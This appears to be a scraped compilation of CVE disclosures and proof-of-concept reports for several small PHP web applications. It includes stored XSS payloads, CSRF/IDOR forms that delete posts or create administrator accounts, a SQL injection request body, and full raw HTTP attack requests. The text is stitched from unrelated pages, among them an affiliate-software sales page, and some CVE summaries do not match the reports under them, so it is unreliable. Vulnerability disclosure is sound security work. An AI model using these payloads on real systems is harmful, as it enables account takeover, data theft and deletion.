Cross Site Scripting (XSS) vulnerability in webTareas 2.2p1 via the Name field to /linkedcontent/editfolder.php.

**Describe the bug**  
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Projects" feature.  
**To Reproduce**  
1\. Login into the panel  
2\. Go to 'webtareas/projects/listprojects.php?'  
3\. Click Add Projects: 'webtareas/projects/editproject.php'  
4\. Insert Payload in "Name" Projects: "><im g="" src="xx" onerror="alert(document.domain)">  
5\. Boom xss alert!  
6\. home page click "Calendar": 'webtareas/general/home.php?msg=noWorkCalendar' >> xss alert message.</im>

**Impact**  
Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.  
**Desktop (please complete the following information):**  
OS: Windows  
Browser: ALL  
**Video POC**

CVE-2021-36609: webTareas / Tickets / #43 Cross Site Script Vulnerability on "Projects" in webtareas feature v2.2p1

Cross Site Scripting (XSS) vulnerability in webTareas 2.2p1 via the Name field to /projects/editproject.php.

*   Summary
*   Files
*   Reviews
*   Support
*   Code
*   Tickets
*   News

Menu ▾ ▴

Milestone: 2.2

Status: closed

Updated: 2021-07-07

Created: 2021-07-07

Private: No

**Describe the bug**  
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Projects" feature.  
**To Reproduce**  
1\. Login into the panel  
2\. Go to Documents: 'webtareas/linkedcontent/listfiles.php?doc\_type=0&id=0'  
3\. Click Add Projects: 'webtareas/linkedcontent/editfolder.php?parent=0'  
4\. Insert Payload in "Name" Documents: "><im g="" src="xx" onerror="alert('xssss')">  
5\. Boom xss alert!  
**  
Impact**  
Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.  
Desktop (please complete the following information):  
OS: Windows  
Browser: ALL  
**imgae poc:**</im>

**2 Attachments**

**Discussion**

Log in to post a comment.

CVE-2021-36608: webTareas / Tickets / #44 Cross Site Script Vulnerability on "Documents" in webtareas feature v2.2p1

An issue in the delete_post() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily delete posts.

**CVE-2022-31295**

Online Discussion Forum Site 1.0 - IDOR / Delete any post

**Exploit Title: Online Discussion Forum Site 1.0 - IDOR / Delete any post****Date: 2022-06-13****CVE: CVE-2022-31295****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu**

\[#\] Vulnerability Location: function delete_post() in /odfs/classes/Maset.php:133

\[#\] Exploitation: <form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user">	 <input type="text" name="id" value="" placeholder="enter POST ID to delete" required> <button type="submit">Delete Post</button> </form>

CVE-2022-31295: GitHub - bigzooooz/CVE-2022-31295: Online Discussion Forum Site 1.0 - IDOR / Delete any post

Victor CMS 1.0 is vulnerable to SQL injection via c_id parameter of admin_edit_comment.php, p_id parameter of admin_edit_post.php, u_id parameter of admin_edit_user.php, and edit parameter of admin_update_categories.php.

CVE-2020-35597

An issue in the save_users() function of Online Discussion Forum Site 1 allows unauthenticated attackers to arbitrarily create or update user accounts.

**CVE-2022-31294**

Online Discussion Forum Site 1.0 - Account Takeover

**Exploit Title: Online Discussion Forum Site 1.0 - CSRF Create New/Update Existing Admin User _\[Account Takeover\]_****Date: 2022-06-13****CVE: CVE-2022-31294****Exploit Author: Abdulaziz Saad (@b4zb0z)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html****Version: 1.0****Tested on: LAMP, Ubuntu**

\[#\] Vulnerability Location: function save_users() in /odfs/classes/Users.php:13

\[#\] Exploitation: <form action="http://localhost/odfs/classes/Users.php?f=save" method="post" id="manage-user">	 <input type="text" name="id" value="" placeholder="Keep empty if you want to create new user / put user ID to edit existing user"> <div class="form-group"> <label for="name">First Name</label> <input type="text" name="firstname" id="firstname" class="form-control" value="" required> </div> <div class="form-group"> <label for="name">Middle Name</label> <input type="text" name="middlename" id="middlename" class="form-control" value=""> </div> <div class="form-group"> <label for="name">Last Name</label> <input type="text" name="lastname" id="lastname" class="form-control" value="" required> </div> <div class="form-group"> <label for="username">Username</label> <input type="text" name="username" id="username" class="form-control" value="" required  autocomplete="off"> </div> <div class="form-group"> <label for="password"> Password</label> <input type="password" name="password" id="password" class="form-control" value="" autocomplete="off"> </div> <div class="form-group"> <label for="type" class="control-label">Type</label> <select name="type" id="type" class="form-control form-control-sm rounded-0" required> <option value="1" >Administrator</option> <option value="2" >Registered User</option> </select> </div> <button type="submit">Save</button> </form>

CVE-2022-31294: GitHub - bigzooooz/CVE-2022-31294: Online Discussion Forum Site 1.0 - Account Takeover

A stored XSS vulnerability in MaianAffiliate v.1.0 allows an authenticated attacker for arbitrary JavaScript code execution in the context of authenticated and unauthenticated users through the MaianAffiliate admin panel.

   

**Welcome to Maian Affiliate**

Free PHP affiliate system. Enhance Your Product Sales.

Maian Affiliate is a FREE, simple, yet powerful **php referral system** system written in PHP. It enables your site visitors to make money from your own products via a simple **php affiliate system**. Maian Affiliate can be used with most websites and ecommerce systems via an easy to use API.

This software was written with ease of use in mind and contains many great features. It\`s a powerful affiliate system written with some of the latest technology and all presented in a cosmetically appealing interface to provide your business with a stable, **php affiliate system**.

Maian Affiliate is self hosted and enables you to promote your products without worrying about third party subscriptions. A one off payment unlocks the full feature set, but you can use the free version as long as you like.

Think affiliate software is too complicated? Maian Affiliate, a **php referral system** might be what exactly what you were looking for.

Why not give it a try today?

**LATEST RELEASE**

**v1.0** was released on 30 October 2018

New version (**v1.1**) is coming soon. More info.

Want notification of new releases? More Info.  
Save Up To 40% with Software Bundles More Info.

**STANDARD FEATURES**

The following come as standard in all versions of Maian Affiliate, a free **php affiliate sales** system.

*   Easy to use PHP affiliate referral system
*   Enhance your product visibility with affiliate promotion
*   Works with the majority of PHP payment gateways/websites
*   Affiliate can easily see overview of sales and referrals
*   Approve accounts and commissions to avoid fraud issues
*   Easy to use API for referrals and commission logging
*   PHP7.3 supported (7.4 & 8.0 Coming Soon)
*   Fast, responsive HTML5 system for mobiles / tablets.

**Main Features - Maian Affiliate - Free PHP Referral System**

**Product Promotion**

Enhance your product sales with affiliate referrals. You\`re happy and your affiliates are happy.

**Mobile Ready**

HTML5 responsive layout for tablets and mobiles via Twitter Bootstrap. Web based, so works in all mobile browsers.

**Powerful API**

Create referrals and commissions via the Maian Affiliate api. Once it\`s set up, it will manage itself.

**Affiliates**

Easy to use account area for affiliates to see promotional data and overviews of sales and commissions.

**Testimonials - Maian Affiliate - Free PHP Affiliate System**

I just bought second license in a week! This script is very easy to use, and if you are a programmer, you can customize it in so many ways. I am very pleased with the auto generated code that you can copy and paste easily on your product site. The best thing that I've not seen in other script is, you can create multiple product in the script and use the code in multiple site. Keep up the good work and I hope I will see some great updates soon.

I use Maian Music and Maian Affiliate, they work in conjunction with each other and I have found them really helpful for me. The support is second to none. The free trial is a super idea to test out if any of the Maian software is suitable for your use. I purchased commercial licences for my Maian software, low cost, good value and I highly recommend the products and the company.

\- Denis Steer

**Recent Support Forum Posts - Maian Affiliate - Free PHP Product Promotion**

CVE-2021-41420: Maian Affiliate

Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the fullname parameter in add-directory.php.

\> \[Suggested description\]

\> Directory Management System v1.0 was discovered to contain a SQL

\> injection vulnerability via the fullname parameter in

\> add-directory.php.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> SQL Injection

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> phpgurukul

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Directory Management System - 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> add-directory.php

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Remote

\>

\> ------------------------------------------

\>

\> \[Impact Information Disclosure\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> POST /dms/admin/add-directory.php HTTP/1.1

\> Host: ip

\> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0

\> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

\> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

\> Accept-Encoding: gzip, deflate

\> Content-Type: application/x-www-form-urlencoded

\> Content-Length: 178

\> Connection: close

\> Cookie: PHPSESSID=eml4bgiglhno5kgmjj8uld5qgs

\> Upgrade-Insecure-Requests: 1

\>

\> fullname=database()','$profession','$email','$mobilenumber','$address',database(),'$admsta')%23&profession=aaaa&email=aaa%40aaa.aaa&mobilenumber=aaa&city=aaa&address=aaaa&submit=

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> laotun

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> http://directory.com

\> http://phpgurukul.com

Use CVE-2022-31384.

CVE-2022-31384: POC/CVE-2022-31384.txt at main · laotun-s/POC

Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the searchdata parameter in search-dirctory.php.

CVE-2022-31382

Zoo Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via zms/admin/public_html/save_animal?an_id=24.

Permalink

**zoo-management-system - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html

Date: 2022-05-07

Vulnerability File: /zms/admin/public\_html/save\_animal?an\_id=24

Vulnerability location: /zms/admin/public\_html/save\_animal?an\_id=24, an\_given\_name

\[+\] Payload: "><sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/zms/admin/public_html/save_animal?an_id=24 HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    Content-Type: multipart/form-data; boundary=---------------------------154827300217808672181041720663
    Content-Length: 4518
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/zms/admin/public_html/save_animal?an_id=24
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    Upgrade-Insecure-Requests: 1
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="animal_id"
    
    24
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_given_name"
    
    	 "><sCrIpT>alert(1)</sCrIpT>
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_species_name"
    
    Acinonyx jubatus
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_dob"
    
    2020-04-04
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_gender"
    
    m
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_avg_lifespan"
    
    20 Years
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="class_id"
    
    1
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="location_id"
    
    4
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_dietary_req"
    
    Meat
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_natural_habitat"
    
    Grassland
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_pop_dist"
    
    20,000 in Asia
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_joindate"
    
    2020-04-11
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_height"
    
    12
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_weight"
    
    12
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_description"
    
    lorem ipsum dolor sit amet
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="images[]"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_med_record"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_transfer"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_transfer_reason"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_death_date"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_death_cause"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="an_incineration"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_gest_period"
    
    2 months
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_category"
    
    Clawed Mammal
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="m_avg_body_temp"
    
    34
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_nest_const"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_clutch_size"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_wingspan"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="b_color_variant"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_body_temp"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_water_type"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="f_color_variant"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="rep_type"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="clutch_size"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="num_offspring"
    
    
    -----------------------------154827300217808672181041720663
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------154827300217808672181041720663--

CVE-2022-31914: 0525/xss.md at main · mikeccltt/0525

Online Fire Reporting System v1.0 is vulnerable to Cross Site Scripting (XSS) via /ofrs/classes/Master.php.

Permalink

**online-fire-reporting-system - Cross-site Scripting (XSS)**

vendors: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html

Date: 2022-05-07

Vulnerability File: /ofrs/classes/Master.php

Vulnerability location: /ofrs/classes/Master.php?f=save\_team, code

\[+\] Payload: <sCrIpT>alert(1)</sCrIpT>

Tested on Windows 10, XAMPP

    POST http://192.168.2.102/ofrs/classes/Master.php?f=save_team HTTP/1.1
    Host: 192.168.2.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------12232441784418479012629232838
    Content-Length: 660
    Origin: http://192.168.2.102
    Connection: close
    Referer: http://192.168.2.102/ofrs/admin/?page=teams/manage_team&id=6
    Cookie: PHPSESSID=vpohrtulukshjgjlje1jbeavrj
    
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="id"
    
    6
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="code"
    
    <sCrIpT>alert(1)</sCrIpT>
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="leader_name"
    
    asd
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="leader_contact"
    
    asd
    -----------------------------12232441784418479012629232838
    Content-Disposition: form-data; name="members"
    
    asd
    -----------------------------12232441784418479012629232838--

Tag

#php